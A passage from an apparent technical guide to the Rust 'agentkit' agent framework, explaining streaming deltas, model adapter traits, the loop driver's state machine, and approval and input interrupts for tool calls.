data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"{\"path\":"}}]}}
data: {"delta":{"tool_calls":[{"index":1,"function":{"arguments":"{\"exec"}}]}}
...

The adapter maintains per-index accumulators and emits separate BeginPart/AppendText/CommitPart sequences for each tool call. The part_id field keeps them distinct.

Reasoning block streaming

Models that expose chain-of-thought (like Claude with extended thinking) stream reasoning blocks before the final answer:

1. BeginPart { id: "r1", kind: Reasoning }
2. AppendText { id: "r1", chunk: "The user wants to know..." }
3. AppendText { id: "r1", chunk: " I should consider..." }
4. CommitPart { part: Reasoning { summary: Some("The user wants..."), ... } }
5. BeginPart { id: "p1", kind: Text }
6. AppendText { id: "p1", chunk: "The answer is 42." }
7. CommitPart { part: Text("The answer is 42.") }

A reporter can display reasoning blocks differently (dimmed, collapsible, in a side panel), while the transcript stores them as ordinary parts that compaction can later drop to save space.

Observer consumption

Reporters observe deltas via the LoopObserver trait:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send + Sync {
    fn handle_event(&self, event: AgentEvent);
}
}

When the driver receives a Delta from the model turn, it wraps it as AgentEvent::ContentDelta(delta) and dispatches it to all registered observers synchronously, in registration order.

This is how real-time text rendering works — the StdoutReporter receives AppendText deltas and writes each chunk to the terminal immediately:

#![allow(unused)]
fn main() {
fn handle_event(&self, event: AgentEvent) {
    if let AgentEvent::ContentDelta(Delta::AppendText { chunk, .. }) = &event {
        print!("{}", chunk);
        std::io::stdout().flush().ok();
    }
}
}

The ordering guarantee matters: within a single driver instance, deltas are delivered to observers in the order the adapter produces them. If the adapter emits AppendText("Hello") before AppendText(", world"), every observer sees them in that order. This is trivially satisfied because observers are called synchronously on the driver’s task — there is no async fan-out or buffering between the adapter and observers.

What observers should and shouldn’t do

Observers are called inline on the driver’s task. They must be fast — a slow observer blocks the entire loop. Guidelines:

Do: write to stderr/stdout, increment counters, append to a Vec
Do: send to a channel for async processing elsewhere
Don’t: make HTTP requests, write to databases, or do anything that might block
Don’t: modify the transcript or influence the loop’s control flow

If you need expensive processing, use a ChannelReporter adapter that forwards events to another task.

Relationship to the transcript

After a turn completes, the transcript contains only committed Part values inside Items. Deltas are discarded. On the next turn, the model receives the transcript — not the deltas that produced it.

During a turn:                        After a turn:

  Delta stream (live)                  Transcript (durable)
  ┌────────────────────┐               ┌─────────────────────────┐
  │ BeginPart          │               │ Item { kind: Assistant, │
  │ AppendText("He")   │               │   parts: [              │
  │ AppendText("llo")  │    fold ──▶   │     Text("Hello"),      │
  │ CommitPart(Text)   │               │     ToolCall { ... },   │
  │ BeginPart          │               │   ]                     │
  │ AppendText("{...") │               │ }                       │
  │ CommitPart(Tool)   │               └─────────────────────────┘
  └────────────────────┘
       (discarded)                          (persisted)

This separation means:

Compaction operates on stable, complete items — it never sees partial deltas
Persistence stores items, not delta streams — simpler storage format
The streaming protocol can evolve independently of the transcript format — adding a new delta variant doesn’t change how transcripts are stored
Replay is possible without streaming — a transcript can be loaded from storage and fed directly to the model without reconstructing the delta sequence

Crate: Delta, PartId, and PartKind are defined in agentkit-core. The folding logic lives in agentkit-loop. Reporters that consume deltas are in agentkit-reporting.

The model adapter boundary

Chapter 1 showed how to build adapters from the outside in — implementing them for specific providers. This chapter looks from the inside out: how the loop consumes the adapter traits, what guarantees it relies on, and what happens when those guarantees are violated.

The adapter boundary is the narrowest point in the architecture. Everything above it (loop logic, tool execution, compaction) is provider-agnostic. Everything below it (HTTP clients, SSE parsing, auth headers) is provider-specific. The three traits define the contract between these two worlds.

Three-level trait hierarchy

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ModelAdapter: Send + Sync {
    type Session: ModelSession;
    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError>;

    // Optional. Lowercase provider identifier (e.g. `openrouter`,
    // `ollama`) stamped onto the `agent.turn` and `chat` spans as
    // `gen_ai.provider.name`. Defaults to `None`.
    fn provider_name(&self) -> Option<&str> { None }
}

#[async_trait]
pub trait ModelSession: Send {
    type Turn: ModelTurn;
    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Self::Turn, LoopError>;

    // Optional. Model identifier the session sends requests to, stamped
    // onto the loop's `chat` span as `gen_ai.request.model`. Defaults
    // to `None`.
    fn model_name(&self) -> Option<&str> { None }
}

#[async_trait]
pub trait ModelTurn: Send {
    async fn next_event(
        &mut self,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError>;
}
}

The Send + Sync bound on ModelAdapter means adapters can be shared across threads — an Agent can be cloned or wrapped in an Arc and used from multiple tasks. ModelSession is only Send, not Sync — sessions are single-owner and move between tasks but are not accessed concurrently. ModelTurn is likewise Send only.

Why three levels?

The decomposition maps to three distinct lifetimes in a provider interaction:

Lifetime	Trait	State it holds
Application	`ModelAdapter`	API key, base URL, HTTP client, model name (immutable, shared)
Session	`ModelSession`	Conversation ID, WebSocket connection, session token (mutable)
Turn	`ModelTurn`	SSE stream, response buffer, chunk parser (mutable, consumed once)

This supports both stateless and stateful providers:

Stateless HTTP providers (OpenAI, OpenRouter, Groq): start_session creates a lightweight handle holding a copy of the config. begin_turn sends the full transcript as an HTTP POST. next_event reads SSE chunks from the response.
Stateful session providers (WebSocket-based, real-time APIs): start_session opens a persistent connection. begin_turn sends a delta or continuation message (not the full transcript). next_event reads frames from the live connection. Session cleanup happens on drop.

The loop doesn’t care which pattern the adapter uses. It calls the same trait methods either way.

Stateless adapter (HTTP):

  Adapter ──start_session──▶ Session (just holds config)
                                │
                                ├──begin_turn──▶ POST /v1/chat/completions
                                │                      │
                                │                Turn ◀┘ (SSE stream handle)
                                │                  │
                                │                  ├── next_event() → Delta
                                │                  ├── next_event() → Delta
                                │                  ├── next_event() → Finished
                                │                  └── next_event() → None
                                │
                                ├──begin_turn──▶ POST /v1/chat/completions
                                │
                                ...


Stateful adapter (WebSocket):

  Adapter ──start_session──▶ Session (owns WebSocket connection)
                                │
                                ├──begin_turn──▶ send continuation frame
                                │                      │
                                │                Turn ◀┘ (reads from same socket)
                                │                  │
                                │                  ├── next_event() → Delta
                                │                  └── next_event() → Finished
                                │
                                ├──begin_turn──▶ send next frame
                                ...

ModelTurnEvent

The model turn emits a stream of normalized events:

#![allow(unused)]
fn main() {
pub enum ModelTurnEvent {
    Delta(Delta),
    ToolCall(ToolCallPart),
    Usage(Usage),
    Finished(ModelTurnResult),
}
}

The adapter is responsible for converting provider-native wire formats into these normalized events. This is where the translation happens — the loop never sees provider-specific response shapes.

The events have a natural ordering within a turn:

Turn event timeline:

  ──────────────────────────────────────────────────────────▶ time

  Delta(BeginPart)
  Delta(AppendText)  ─┐
  Delta(AppendText)   │  streaming text
  Delta(AppendText)  ─┘
  Delta(CommitPart)

  ToolCall(ToolCallPart)    ← fully assembled tool call
  ToolCall(ToolCallPart)    ← another tool call (if parallel)

  Usage(Usage)              ← token counts

  Finished(ModelTurnResult) ← always last

Finished always comes last. Usage typically comes just before Finished but some providers interleave it with deltas. ToolCall events represent fully assembled tool calls — the adapter has already accumulated the streaming chunks internally.

ModelTurnResult

#![allow(unused)]
fn main() {
pub struct ModelTurnResult {
    pub finish_reason: FinishReason,
    pub output_items: Vec<Item>,
    pub usage: Option<Usage>,
    pub metadata: MetadataMap,
}
}

The output_items field carries the complete assistant response as transcript items. The loop appends these directly to the transcript. finish_reason tells the loop what to do next — execute tool calls, return to the host, or handle an error.

TurnRequest

The loop constructs a TurnRequest containing everything the adapter needs:

#![allow(unused)]
fn main() {
pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

The loop owns TurnRequest construction. The host doesn’t rebuild model-facing state manually each turn. The transcript field contains the full conversation so far — system prompt, context items, user messages, assistant responses, tool results. For stateless providers, this is sent in every request. For stateful providers, the adapter decides what subset to send.

available_tools contains the tool specifications from the registry. The adapter converts these into the provider’s tool schema format (typically { "type": "function", "function": { ... } }).

metadata is a pass-through for per-turn options. The host can set provider-specific parameters here without the loop needing to understand them.

cache is the normalized prompt caching request for the turn. The adapter maps it into provider-native controls or explicit cache headers. That mapping is covered in Chapter 15.

Cancellation threading

Both begin_turn and next_event accept an Option<TurnCancellation>. The loop creates a checkpoint at the start of each turn and passes it through:

Host calls controller.interrupt()
         │
         ▼
  CancellationController bumps generation (0 → 1)
         │
         ├──▶ TurnCancellation in begin_turn()
         │    checkpoint.is_cancelled() → true
         │    adapter can abort the HTTP request
         │
         └──▶ TurnCancellation in next_event()
              checkpoint.is_cancelled() → true
              adapter can stop reading the SSE stream

The adapter should check cancellation at natural yield points — before sending an HTTP request, between SSE chunks, or in a tokio::select! race. When cancelled, return Err(LoopError::Cancelled) and the loop handles the rest.

The normalization contract

The adapter has one critical responsibility: produce correct normalized types. The loop’s behaviour depends on these guarantees:

Guarantee	What happens if violated
`Finished` is emitted exactly once, as the last event	Loop hangs or processes stale events
`FinishReason::ToolCall` when tool calls are present	Loop ignores tool calls, returns text-only
`ToolCallPart` has a unique, non-empty `id`	Tool results can’t be correlated; model sees wrong results
`ToolCallPart.input` is valid JSON	Tool receives unparseable input, returns an error
`Usage` token counts are accurate	Compaction triggers fire at wrong times; cost reporting is wrong
`Delta` sequences follow BeginPart → Append* → CommitPart	Reporter renders garbage; buffer state is inconsistent

These are not enforced at the type level — the adapter must get them right. This is the most important surface to test when implementing a new provider.

Testing the contract

Write tests that verify each guarantee in isolation:

Send a simple text prompt → assert Delta sequence ends with CommitPart and Finished
Send a prompt that triggers tool calls → assert ToolCall events have valid IDs and JSON input
Send a prompt that hits the token limit → assert FinishReason::MaxTokens
Cancel mid-stream → assert the adapter returns LoopError::Cancelled cleanly
Verify Usage token counts are non-zero and plausible

Mock the HTTP layer or use a local test server. Don’t test against live provider APIs in CI — they’re slow, flaky, and cost money.

Runtime independence

agentkit-loop is runtime-agnostic — it depends on async traits, not on tokio directly. The model adapter traits use async_trait and require only Send, not any runtime-specific bounds.

In practice, most adapters dispatch HTTP through the agentkit-http crate. The default HttpClient is reqwest-backed on tokio; a reqwest-middleware client is available behind an optional feature, and custom impls can be supplied for tests. The loop crate itself stays executor-agnostic — tokio, async-std, or a custom runtime all work — because runtime-specific concerns live in leaf crates (provider adapters, task managers).

The futures-timer crate is used for the cancellation polling delay instead of tokio::time, keeping the core free of runtime dependencies.

Example: openrouter-chat shows a minimal adapter in action — one model, one session, one turn, rendered to stdout.

Crate: The adapter traits are defined in agentkit-loop. Provider adapters live in agentkit-provider-* crates.

Driving the loop

This chapter walks through the LoopDriver — the runtime heart of the agent. We’ll trace a complete turn from input submission through model invocation, tool execution, and final result.

The driver API

The LoopDriver is generic over the model session type:

#![allow(unused)]
fn main() {
pub struct LoopDriver<S: ModelSession> {
    session_id: SessionId,
    session: Option<S>,
    tool_executor: Arc<dyn ToolExecutor>,
    task_manager: Arc<dyn TaskManager>,
    permissions: Arc<dyn PermissionChecker>,
    resources: Arc<dyn ToolResources>,
    cancellation: Option<CancellationHandle>,
    mutators: Vec<Arc<dyn LoopMutator>>,
    observers: Vec<Arc<dyn LoopObserver>>,
    transcript_observers: Vec<Arc<dyn TranscriptObserver>>,
    transcript: Vec<Item>,
    pending_input: Vec<Item>,
    pending_approvals: BTreeMap<ToolCallId, PendingApprovalToolCall>,
    active_tool_round: Option<ActiveToolRound>,
    next_turn_index: u64,
    /* … */
}
}

The public API is narrow:

#![allow(unused)]
fn main() {
impl<S: ModelSession> LoopDriver<S> {
    pub async fn next(&mut self) -> Result<LoopStep, LoopError>;
    pub fn resolve_approval_for(&mut self, call_id: ToolCallId, decision: ApprovalDecision)
        -> Result<(), LoopError>;
    pub fn set_next_turn_cache(&mut self, cache: PromptCacheRequest) -> Result<(), LoopError>;
    pub fn snapshot(&self) -> LoopSnapshot;
}
}

There is no submit_input on the driver. The prior transcript is preloaded via AgentBuilder::transcript as passive starting state, and an opening user turn for one-shot calls is preloaded via AgentBuilder::input. After that, every user turn is supplied through the InputRequest and ToolRoundInfo handles surfaced on cooperative interrupts. Funnelling every transcript mutation through the driver itself preserves the &mut LoopDriver invariant — no other task or thread can race with next().

The host code is a simple loop. With nothing preloaded as input, the first call to next() yields AwaitingInput:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .transcript(vec![system_item])
    .build()?;

let mut driver = agent.start(session_config).await?;

loop {
    match driver.next().await? {
        LoopStep::Interrupt(LoopInterrupt::AwaitingInput(req)) => {
            req.submit(&mut driver, read_user_input()?)?;
        }
        LoopStep::Interrupt(interrupt) => handle_interrupt(interrupt),
        LoopStep::Finished(result) => break,
    }
}
}

State machine semantics

next() is the only async method. It advances the driver through its internal state machine until it hits a yield point — either a finished turn or an interrupt. There is no polling, no callback registration, and no event queue to drain.

Driver state machine:

       Agent::builder()
         .transcript(prior)        // passive, optional
         .input(opening_turn)      // optional one-shot opener
         .build()?
         .start(cfg)
                      │
                      ▼  (transcript & pending input baked in)
  ┌─────────────────────────────────┐
  │         Has pending input?      │
  │                                 │
  │  yes ──▶ merge into transcript  │
  │  no  ──▶ AwaitingInput         ─┼──▶ Interrupt (cooperative)
  └─────────────┬───────────────────┘     host: req.submit(...) or drop
                │
                ▼
  ┌─────────────────────────────────┐
  │      Model turn                 │
  │                                 │
  │  stream events from model       │
  │  collect tool calls             │
  │  emit AgentEvents to observers  │
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │      Tool calls present?        │
  │                                 │
  │  no  ──▶ Finished(TurnResult)  ─┼──▶ return
  │  yes ──▶ permission preflight   │
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │    Any require approval?        │
  │                                 │
  │  yes ──▶ ApprovalRequest       ─┼──▶ Interrupt (blocking)
  │  no  ──▶ execute tools          │
  └─────────────┬───────────────────┘
                │
                ▼
       append tool results
                │
                ▼
       run mutators at MutationPoint::AfterToolResult
                │
                ▼
  ┌─────────────────────────────────┐
  │   AfterToolResult              ─┼──▶ Interrupt (cooperative)
  │                                 │    host: info.submit(...) to
  │   host calls next() to resume  ◀┼─── interject, then next() to
  └─────────────┬───────────────────┘    resume into the next model turn
                │
                ▼
       go to "Model turn" ◀─── automatic tool roundtrip


When a turn ends (Finished, Interrupt, Cancelled), mutators run again at
MutationPoint::AfterTurnEnded before the next user turn begins.

The host cannot call next() twice without resolving an outstanding blocking interrupt (ApprovalRequest) — that’s a state error. Cooperative interrupts (AwaitingInput, AfterToolResult) require no resolution; calling next() again resumes the loop as described in the diagram. The driver forces the host to deal with blocking interrupts before proceeding so an approval request can never be silently skipped.

Anatomy of a turn

Here’s what happens inside next(), step by step:

1. Merge input

Pending items — submitted through an InputRequest / ToolRoundInfo handle — are appended to the working transcript. The driver emits AgentEvent::InputAccepted to observers. (The transcript handed to Agent::start is loaded passively at session creation and is not re-merged here.)

Before:
  transcript: [System, Context, User("hello"), Assistant("Hi!")]
  pending:    [User("Read main.rs")]

After merge:
  transcript: [System, Context, User("hello"), Assistant("Hi!"), User("Read main.rs")]
  pending:    []

2. Construct TurnRequest

The loop builds a TurnRequest from the working transcript and tool registry:

#![allow(unused)]
fn main() {
TurnRequest {
    session_id: self.session_id.clone(),
    turn_id: TurnId::new(format!("turn-{}", self.next_turn_index)),
    transcript: self.transcript.clone(),
    available_tools: self.tool_executor.specs(),
    metadata: MetadataMap::new(),
    cache: self.next_turn_cache.take().or_else(|| self.default_cache.clone()),
}
}

3. Start model turn

session.begin_turn(request, cancellation) sends the transcript to the provider and returns a streaming turn handle.

4. Stream model output

The driver polls turn.next_event() in a loop:

Loop:
  next_event() ──▶ Some(Delta(BeginPart))       ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(Delta(AppendText))      ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(Delta(CommitPart))      ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(ToolCall(ToolCallPart)) ──▶ collect for execution
  next_event() ──▶ Some(Usage(Usage))           ──▶ emit UsageUpdated to observers
  next_event() ──▶ Some(Finished(result))       ──▶ break

5. Execute tools

If the model requested tool calls (indicated by FinishReason::ToolCall):

The driver constructs a ToolRequest for each ToolCallPart
Each request goes through the task manager for scheduling
The task manager routes each tool call (foreground, background, or foreground-then-detach)
The executor runs permission preflight on each tool
If any tool requires approval → the driver surfaces LoopStep::Interrupt(ApprovalRequest)
Otherwise → tools execute and results are appended to the transcript as ToolResultParts

Auth challenges from MCP-backed tools are not loop interrupts. They surface as ToolError::AuthRequired(AuthRequest) from the tool, the driver records the failure on the transcript, and the host completes the auth flow out-of-band via McpServerManager::resolve_auth. The next tool call reconnects with the new credentials.

6. Run AfterToolResult mutators

After tool results are appended, the driver runs every registered LoopMutator at MutationPoint::AfterToolResult. Mutators decide for themselves whether to fire (compaction triggers, redaction rules, etc.). If any mutator dirtied the transcript, the loop validates protocol invariants (tool_use ↔ tool_result pairing); a violation is a hard LoopError::Mutator failure rather than letting the next request blow up at the provider.

7. Tool roundtrip

The driver yields LoopStep::Interrupt(AfterToolResult(info)) before invoking the model again. The host has a chance to call info.submit(&mut driver, items)? to interject a user message at this boundary — the resulting transcript [..., tool_call, tool_result, user] is valid for the next model call. Calling next() again resumes the turn into the next model call (back to step 3). The model sees the tool results (and any injected message) and may request more tools or produce a final response.

8. Return result

When the model finishes without pending tool calls, the driver returns:

#![allow(unused)]
fn main() {
LoopStep::Finished(TurnResult {
    turn_id,
    finish_reason: FinishReason::Completed,
    items: /* assistant items from this turn */,
    usage: /* accumulated usage */,
    metadata: MetadataMap::new(),
})
}

Multiple tool roundtrips per user turn

A single user message can trigger many tool roundtrips. Between each one the driver yields AfterToolResult back to the host:

User: "Add error handling to src/parser.rs"

  Model call 1: ToolCall(fs_read_file)
                execute → result appended
  ──▶ next() returns Interrupt(AfterToolResult)
      (host may info.submit(...) or just call next())

  Model call 2: ToolCall(fs_replace_in_file)
                execute → result appended
  ──▶ next() returns Interrupt(AfterToolResult)

  Model call 3: ToolCall(shell_exec("cargo check"))
                execute → result appended
  ──▶ next() returns Interrupt(AfterToolResult)

  Model call 4: Text("I've added error handling...")
                no tool calls
  ──▶ next() returns Finished(TurnResult)

Host sees: four calls to next(), three cooperative yields, one Finished.

From the host’s perspective, each tool round ends with a cooperative yield. Non-interactive callers match AfterToolResult with continue and see essentially one “turn” delivered as a final TurnResult; interactive callers can interject user input at each boundary without cancelling the turn. Either way, the model chains tool calls without the host having to mediate each call — only the round boundaries are exposed.

Event delivery during a turn

While the driver processes a turn, non-blocking events are delivered to observers synchronously:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send + Sync {
    fn handle_event(&self, event: AgentEvent);
}
}

Observers take &self and store mutable state behind interior mutability (Mutex, atomics, channels). The driver shares each observer as Arc<dyn LoopObserver> so a single configured Agent can mint multiple sessions over its lifetime.

The full event taxonomy:

Event	When it fires
`RunStarted`	`Agent::start()` completes
`TurnStarted`	Before each model turn begins
`InputAccepted`	The driver merges pending input into the transcript
`ContentDelta(Delta)`	Model streams a delta
`ToolCallRequested`	Model requests a tool call
`ToolResultReceived`	A tool result lands in the transcript (foreground or background)
`ApprovalRequired`	A tool requires approval
`ApprovalResolved`	An approval interrupt is resolved
`ToolCatalogChanged`	A federated tool source’s catalog changed; the next request will see the new tool list
`MutationStarted`	A `LoopMutator` is about to run at a `MutationPoint`
`MutationFinished`	A `LoopMutator` finished; `dirty` indicates whether the transcript was modified
`UsageUpdated(Usage)`	Token usage reported
`Warning(String)`	Non-fatal issue (recovered tool error, etc.)
`RunFailed(String)`	Unrecoverable error
`TurnFinished(TurnResult)`	A turn completes

Observers are called inline, synchronously, in registration order. The loop task blocks briefly for each observer call. This is acceptable because observers should be fast — write to stderr, increment a counter, append to a buffer. Expensive processing should happen asynchronously behind a channel adapter.

For loss-free transcript reconstruction (persistence, replication, audit), the driver also fans out to a separate TranscriptObserver channel that fires once per Item appended, in transcript order. LoopObserver alone is not sufficient for this — content deltas span partial parts and historically tool results were appended without an event at all. Mutator-driven rewrites do not fire on_item_appended; those are signaled by AgentEvent::MutationFinished. Register via AgentBuilder::transcript_observer.

Building the agent

The Agent is built with a builder:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)                          // required
    .add_tool_source(registry)               // optional; call again to federate
    .permissions(checker)                    // default: allow all
    .resources(resources)                    // default: ()
    .task_manager(manager)                   // default: SimpleTaskManager
    .cancellation(cancellation_handle)       // default: none
    .compaction(config)                      // default: none
    .observer(reporter)                      // default: none
    .transcript_observer(persistence)        // default: none
    .transcript(vec![system_item])           // default: empty
    .input(vec![first_user_turn])            // default: empty (one-shot opener)
    .build()?;

let mut driver = agent.start(session_config).await?;
}

The builder validates that a model adapter is set. Everything else has sensible defaults:

Field	Default	Effect
`tool_sources`	`[]`	Model can’t call any tools
`permissions`	`AllowAllPermissions`	Every tool call is auto-approved
`resources`	`()`	No shared resources
`task_manager`	`SimpleTaskManager`	Sequential, inline tool execution
`cancellation`	`None`	No cancellation support
`compaction`	`None`	Transcript grows without bounds
`observers`	`[]`	No event reporting
`transcript_observers`	`[]`	No transcript persistence hook

Agent::start() consumes the agent and returns a LoopDriver with the supplied transcript loaded passively. The first call to next() yields AwaitingInput; the host supplies the first user turn via InputRequest::submit, and the driver dispatches the model on the next next(). The agent’s immutable configuration (adapter, tool sources, permissions) is moved into the driver. Multiple drivers can be created from the same Agent type by cloning it first.

Tool sources federate

add_tool_source accepts any ToolSource. Sources are walked in registration order; the default CollisionPolicy is FirstWins. A typical interactive agent stitches three together:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .add_tool_source(native_registry)             // frozen built-ins
    .add_tool_source(mcp_manager.source())        // CatalogReader from McpServerManager
    .add_tool_source(skill_watcher.reader())      // dynamic_catalog reader
    .build()?;
}

Dynamic sources publish ToolCatalogEvents; the driver re-snapshots the available tools at each model call boundary and emits AgentEvent::ToolCatalogChanged so observers can log what changed.

Snapshots

The driver exposes a read-only snapshot for inspection or persistence:

#![allow(unused)]
fn main() {
let snapshot: LoopSnapshot = driver.snapshot();
// snapshot.session_id, snapshot.transcript, snapshot.pending_input
}

This is useful for debugging (inspect the transcript mid-session), persistence (serialize and resume later), and testing (assert on transcript state).

Cancellation

If the host connects a CancellationHandle (e.g. wired to a Ctrl-C handler), the driver creates TurnCancellation checkpoints and passes them to model turns and tool executions:

Host wires Ctrl-C:

  ctrlc::set_handler(move || controller.interrupt());

Driver flow:

  1. checkpoint = cancellation.checkpoint()
  2. session.begin_turn(request, Some(checkpoint.clone()))
  3. turn.next_event(Some(checkpoint.clone()))
     └── if cancelled → LoopError::Cancelled
  4. tool.invoke(request, ctx)  // ctx.cancellation = Some(checkpoint)
     └── if cancelled → ToolError::Cancelled

When cancellation fires, the current turn ends with FinishReason::Cancelled. The driver adds metadata (agentkit.interrupted: true, agentkit.interrupt_reason: "user_cancelled") to the turn result so the host can distinguish cancellation from normal completion.

Example: openrouter-coding-agent demonstrates a driver executing filesystem tool calls across multiple roundtrips in a single turn.

Crate: agentkit-loop — the Agent, AgentBuilder, LoopDriver, LoopStep, TurnResult, and LoopSnapshot types.

Interrupts and control flow

The loop runs autonomously until it hits a yield point that requires or invites host action. Some yields are blocking (the loop genuinely cannot proceed without an answer), others are cooperative (the host may interject but can also ignore the yield and call next() again to resume). Both are surfaced through the same LoopStep::Interrupt channel. This chapter covers each variant, the blocking/cooperative distinction, and how hosts resolve or pass through them.

The interrupt model

#![allow(unused)]
fn main() {
pub enum LoopStep {
    Interrupt(LoopInterrupt),
    Finished(TurnResult),
}

pub enum LoopInterrupt {
    ApprovalRequest(PendingApproval),
    AwaitingInput(InputRequest),
    AfterToolResult(ToolRoundInfo),
}

impl LoopInterrupt {
    /// `true` for variants that must be resolved before the loop can
    /// make progress: `ApprovalRequest`.  `false` for cooperative
    /// yields the host may ignore: `AwaitingInput`, `AfterToolResult`.
    pub fn is_blocking(&self) -> bool { /* ... */ }
}
}

Each variant represents a different reason control returned to the host. ApprovalRequest and AwaitingInput carry handle types (PendingApproval, InputRequest) with ergonomic resolution methods. AfterToolResult carries a ToolRoundInfo snapshot (session_id, turn_id, transcript_len) and exposes the same submit(...) shape as InputRequest, so the host can interject a user message without cancelling the turn — or just call next() again to continue.

MCP auth is not an interrupt. Earlier versions of agentkit included a fourth AuthRequest(PendingAuth) variant. Auth is now handled outside the loop: tool adapters return ToolError::AuthRequired(AuthRequest) and the host completes the flow via McpServerManager::resolve_auth. The next tool call reconnects with the resolved credentials. Keeping auth out of the loop’s interrupt set keeps the state machine small and lets non-MCP hosts ignore the concept entirely.

Loop autonomy boundary:

  ┌──────────────────────────────────────────────────────┐
  │                Autonomous zone                       │
  │                                                      │
  │   model turn → stream deltas → collect tool calls    │
  │   permission check → tool execution → append result  │
  │   compaction → next model turn → ...                 │
  │                                                      │
  │   The loop runs here without host involvement.       │
  └──────────────────────────┬───────────────────────────┘
                             │
                    yield point (interrupt)
                             │
  ┌──────────────────────────▼───────────────────────────┐
  │                Host decision zone                    │
  │                                                      │
  │   blocking:    "Approve this shell command?"         │
  │   cooperative: "Type your next message"              │
  │   cooperative: "Tool round done — interject?"        │
  │                                                      │
  │   The host handles this, then calls next() again.    │
  └──────────────────────────────────────────────────────┘

Approval interrupts

When a tool’s permission policy returns RequireApproval, the loop pauses and surfaces the request:

#![allow(unused)]
fn main() {
pub struct ApprovalRequest {
    pub task_id: Option<TaskId>,
    pub call_id: Option<ToolCallId>,
    pub id: ApprovalId,
    pub request_kind: String,      // e.g. "filesystem.write", "shell.command"
    pub reason: ApprovalReason,
    pub summary: String,
    pub metadata: MetadataMap,
}
}

The reason field tells the host why approval is needed:

#![allow(unused)]
fn main() {
pub enum ApprovalReason {
    PolicyRequiresConfirmation,   // Policy always requires approval for this kind
    EscalatedRisk,                // Operation flagged as higher risk than usual
    UnknownTarget,                // Target not recognised by any policy
    SensitivePath,                // Filesystem path outside the allowed set
    SensitiveCommand,             // Shell command not in the allow-list
    SensitiveServer,              // MCP server not in the trusted set
    SensitiveAuthScope,           // MCP auth scope not pre-approved
}
}

The host resolves using the PendingApproval handle:

#![allow(unused)]
fn main() {
match driver.next().await? {
    LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
        println!("Tool needs approval: {}", pending.request.summary);

        // Option 1: approve
        pending.approve(&mut driver)?;

        // Option 2: deny
        pending.deny(&mut driver)?;

        // Option 3: deny with reason (fed back to model)
        pending.deny_with_reason(&mut driver, "User declined")?;
    }
    ...
}
}

After resolution, the host calls next() again. If approved, the tool executes and the turn continues. If denied, the denial is reported back to the model as a tool error — the model sees the denial reason and can adjust its approach.

The approval flow in detail

1. Model emits ToolCall(fs_replace_in_file, { path: "/etc/hosts", ... })
                          │
2. Executor runs permission preflight
   └── PathPolicy: /etc/hosts is outside workspace → RequireApproval(SensitivePath)
                          │
3. Driver emits AgentEvent::ApprovalRequired to observers (for UI/logging)
                          │
4. Driver returns LoopStep::Interrupt(ApprovalRequest(PendingApproval { ... }))
                          │
                   ─── host decision ───
                          │
5a. host calls pending.approve(driver)
    └── tool executes → result appended → loop resumes
                    OR
5b. host calls pending.deny(driver)
    └── denial sent to model as ToolResultPart { is_error: true, output: "Permission denied: ..." }
    └── model sees the error and may try a different approach

Multiple pending approvals

When the model requests several tool calls in a single turn, some may require approval while others don’t. The driver surfaces one approval at a time, in the order the model emitted them:

Model response: [ToolCall("fs.write", ...), ToolCall("shell_exec", ...), ToolCall("fs.read", ...)]

Permission check:
  fs.write     → RequireApproval (outside workspace)
  shell_exec   → RequireApproval (unknown command)
  fs.read      → Allow

next() → Interrupt(ApprovalRequest for fs.write)
  host approves
next() → Interrupt(ApprovalRequest for shell_exec)
  host denies
next() → tools execute (fs.write runs, shell_exec denied, fs.read runs)
       → results appended, loop continues

The driver tracks pending approvals in a BTreeMap<ToolCallId, PendingApprovalToolCall> with a VecDeque for ordering. Each approval is surfaced individually, but they belong to the same tool round — the driver only starts tool execution once all pending approvals are resolved.

Why interrupts, not callbacks

An alternative design would pass a callback or channel into the tool executor. agentkit uses interrupts instead because:

Explicit control flow — the host’s main loop always knows what state the driver is in. There’s no hidden state machine running in the background.
No hidden concurrency — approval doesn’t happen on a background thread while the loop keeps running. The loop is genuinely paused.
Testability — interrupt-based flows are easy to test: submit input, call next(), assert you get the expected interrupt, resolve it, call next() again. No mocking of async channels.
Serializable state — an interrupted driver can be snapshotted and resumed later, because the interrupt carries all state needed for resolution.

Callback model (rejected):

  loop calls tool → tool calls approval_callback → callback calls host code
  └── Who owns the stack? Can the host do async work? What if the host panics?
      What if multiple tools need approval concurrently?

Interrupt model (adopted):

  loop calls tool → tool needs approval → loop returns Interrupt to host
  └── Host owns the stack. Host does whatever it needs. Calls next() when ready.

Auth — handled outside the loop

MCP servers and external tools may require authentication. agentkit does not model auth as a loop interrupt. The flow:

A tool call surfaces ToolError::AuthRequired(AuthRequest). The driver writes the failure to the transcript as a tool error and continues — the model sees that the call could not be completed.
The host (which owns the McpServerManager) reads the AuthRequest either from the tool error metadata or from manager.resolve_auth_and_resume(...)-style entry points, runs whatever auth flow it needs (OAuth, API key prompt, secret-store fetch), and submits the resolution.
Subsequent calls reconnect with the new credentials transparently.

#![allow(unused)]
fn main() {
manager
    .resolve_auth(AuthResolution::provided(request, credentials))
    .await?;
}

This keeps the loop state machine to three interrupts and lets hosts that don’t use MCP ignore auth entirely. See Chapter 17 for the manager-side surface (AuthRequest, AuthOperation, AuthResolution, McpAuthResponder).

Input interrupts

When the model finishes a turn and the loop has no pending input, it returns AwaitingInput:

#![allow(unused)]
